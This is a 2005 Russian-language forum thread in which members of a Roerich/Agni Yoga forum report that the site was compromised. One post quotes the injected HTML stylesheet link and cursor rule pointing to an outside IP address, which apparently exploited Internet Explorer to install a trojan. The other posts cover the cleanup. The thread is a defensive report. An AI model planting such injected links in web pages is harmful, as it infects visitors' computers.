Агни Йога (Живая Этика), Теософия, наследие семьи Рерихов, Е.П.Блаватской и их Учителей
Forum.Roerich
Живая Этика (Агни Йога), Теософия

Правила форума Справка Расширения Форум
Регистрация :: Забыли пароль?

Поиск: в Google по Агни Йоге

Создать новую тему Ответ
Показать только "Спасибо!"
Показать важные сообщения
 
Опции темы Опции просмотра
Старый 09.04.2005, 10:52   #1
Dron.ru
 
Аватар для Dron.ru
 
Рег-ция: 25.09.2004
Адрес: Москва, Кремль :-)
Сообщения: 4,661
Благодарности: 116
Поблагодарили 345 раз(а) в 235 сообщениях
По умолчанию Сайт forum.roerich.com инфицирован

Вчера в очередной раз зашёл на forum.roerich.com и подцепил html вирус m00.exe. Уязвимы почти все версии эксплорера (у меня v6.0.26). Блокировать вирус можно любой прогой вырезающей рекламу по ключевым словам (добавьте ключевое слово my.css).

Рекомендую администрации сайта обратить внимание на строчку html кода форума href="http://66.246.224.19/my.css" type="text/css" по которой подгружается троян body { cursor: url('http://66.246.224.19/my.ani');
Dron.ru вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 09.04.2005, 20:32   #2
Кайвасату
 
Аватар для Кайвасату
 
Рег-ция: 09.03.2003
Адрес: Минск
Сообщения: 14,132
Записей в дневнике: 1
Благодарности: 1,107
Поблагодарили 1,129 раз(а) в 827 сообщениях
По умолчанию Re: Сайт forum.roerich.com инфицирован

Цитата:
Сообщение от Dron.ru
Вчера в очередной раз зашёл на forum.roerich.com и подцепил html вирус m00.exe. Уязвимы почти все версии эксплорера (у меня v6.0.26). Блокировать вирус можно любой прогой вырезающей рекламу по ключевым словам (добавьте ключевое слово my.css).

Рекомендую администрации сайта обратить внимание на строчку html кода форума href="http://66.246.224.19/my.css" type="text/css" по которой подгружается троян body { cursor: url('http://66.246.224.19/my.ani');
С форумом действительно что-то не так, уже второй день он у меня отображается какими-то другими цветами
__________________
Те, к кому труднее всего испытывать любовь, нуждаются в ней более других...
Кайвасату вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 09.04.2005, 22:21   #3
Dron.ru
 
Аватар для Dron.ru
 
Рег-ция: 25.09.2004
Адрес: Москва, Кремль :-)
Сообщения: 4,661
Благодарности: 116
Поблагодарили 345 раз(а) в 235 сообщениях
По умолчанию

Отображается другими цветами именно потому что все цвета и оформление прописываются в файле стилей (.css), ссылку на который вирус заменил на ссылку на инфицированный файл css подгружающийся с левого айпишника. В этом файле css вместо цветовых констант прописан код, который приводит к переполнению буфера эксплорера и установке на комп юзера трояна.

Чтобы устранить проблему достаточно на сервере заменить в php скриптах ссылку с инфицированного css на css который был до этого. Ну и надо поймать червя за хвост в автозагрузке дабы он снова не переписал php код
Dron.ru вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 10.04.2005, 00:30   #4
Свет
 
Рег-ция: 23.02.2005
Сообщения: 99
Благодарности: 0
Поблагодарили 1 раз в 1 сообщении
По умолчанию

Если администратор не поторопится, то форум потеряет много участников
__________________
Явите распознавание!
Свет вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 10.04.2005, 12:56   #5
Aёй Мах-Мах
Banned
 
Рег-ция: 20.08.2004
Сообщения: 714
Благодарности: 0
Поблагодарили 2 раз(а) в 2 сообщениях
По умолчанию

вы это... поменьше про всякие уязвимости в форумах пишите...
есть люди, которе намеренно ищут подобную информацию в практических целях, а при поиске случайно натыкаются на ваш форум...
вы сами их притягиваете.
Aёй Мах-Мах вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 10.04.2005, 18:42   #6
Свет
 
Рег-ция: 23.02.2005
Сообщения: 99
Благодарности: 0
Поблагодарили 1 раз в 1 сообщении
По умолчанию

Во множестве тем начальное сообщение отсутствует. Сложность открыть профиль с дальнейшим процессом и т.д.
Будут ли информировать участников о предринимающих действиях со стороны администратора, ведь данные имеются?
Если продлиться ситуация невединия, кто-то не может войти, кто-то не может нормально просмотреть, то по разным условиям разбегутся.
Может нужно сделать каникулы и отпуска , но для этого всё же следует оповестить участников, чтобы отдых не затянулся на долго
Свет вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 10.04.2005, 22:51   #7
rodnoy
 
Аватар для rodnoy
 
Рег-ция: 14.12.2002
Адрес: Донецк -> Atlanta
Сообщения: 1,133
Благодарности: 0
Поблагодарили 9 раз(а) в 9 сообщениях
По умолчанию

Мой Norton Antivirus выловил трояна "Trojan.Moo".
Игорь - необходимо СРОЧНО форум полечить

САРВА МАНГАЛАМ!
__________________
До свидания. С уважением.
Родной
rodnoy вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 11.04.2005, 11:16   #8
Beholder
 
Рег-ция: 20.04.2004
Адрес: Тульская губерния
Сообщения: 16
Благодарности: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Beholder с помощью ICQ
По умолчанию

Лишний повод воспользоваться альтернативными браузерами. Например, Mozilla Firefox.
Beholder вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 11.04.2005, 12:18   #9
Igor Prolis
Administrator
 
Рег-ция: 26.11.2002
Адрес: Санкт-Петербург
Сообщения: 1,647
Благодарности: 1
Поблагодарили 13 раз(а) в 10 сообщениях
По умолчанию

Форум сейчас вылечил. Перевожу его на последнюю версию, где не должно быть подобных уязвимостей.
Igor Prolis вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 11.04.2005, 13:06   #10
Свет
 
Рег-ция: 23.02.2005
Сообщения: 99
Благодарности: 0
Поблагодарили 1 раз в 1 сообщении
По умолчанию

Игорь, спасибо
Свет вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 11.04.2005, 15:30   #11
Sagittari
 
Аватар для Sagittari
 
Рег-ция: 18.03.2005
Адрес: Россия
Сообщения: 181
Благодарности: 0
Поблагодарили 1 раз в 1 сообщении
Отправить сообщение для Sagittari с помощью ICQ
По умолчанию

Все-таки целесообразно было бы предупредить о троянских конях, это бы оценили форумчане, которые сейчас чистят машины, а некоторые и не знают, что с ними сейчас происходит. Сам долго не мог понять в чем дело, пока не обновил антивирусник.
Надо сделать выводы из сложившейся ситуации на будущее.
С Уважением, Sagittari
__________________
"Урусвати знает, что самое ярое отрицание живет рядом с восторженным признанием... Много примеров, когда самые ярые гонители превращались в преданнейших последователей..." Надземное 624
Sagittari вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 11.04.2005, 17:56   #12
Кайвасату
 
Аватар для Кайвасату
 
Рег-ция: 09.03.2003
Адрес: Минск
Сообщения: 14,132
Записей в дневнике: 1
Благодарности: 1,107
Поблагодарили 1,129 раз(а) в 827 сообщениях
По умолчанию

Цитата:
Сообщение от Igor Prolis
Форум сейчас вылечил. Перевожу его на последнюю версию, где не должно быть подобных уязвимостей.
Советую по этому поводу http://myphpbb.com.ru/
Сам недавно обновлял с 2.0.11 до 2.0.13 по тамошним FAQ. Если изменять ручками, то останутся все уже добавленные прибамбасы.
__________________
Те, к кому труднее всего испытывать любовь, нуждаются в ней более других...
Кайвасату вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Старый 13.04.2005, 11:49   #13
Kay Ziatz
 
Рег-ция: 16.12.2002
Адрес: Москва
Сообщения: 2,456
Благодарности: 0
Поблагодарили 29 раз(а) в 28 сообщениях
По умолчанию финское правительство не советует использовать IE

http://net.compulenta.ru/52210/

Можно сказать и ширше: в течение более 10 лет я стараюсь как можно меньше использовать любые программы Microsoft и в результате за всё это время не страдал от вирусов.
Kay Ziatz вне форума  
Показать ответы на данное сообщение Ответить с цитированием Вверх
Создать новую тему Ответ

  Агни Йога (Живая Этика), Теософия, наследие семьи Рерихов, Е.П.Блаватской и их Учителей > Специальные > Работа форума

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

Быстрый переход

Часовой пояс GMT +3, время: 06:08.


Дельфис Орифламма Agni-Yoga Top Sites Энциклопедия Агни Йоги МАДРА Практика Агни Йоги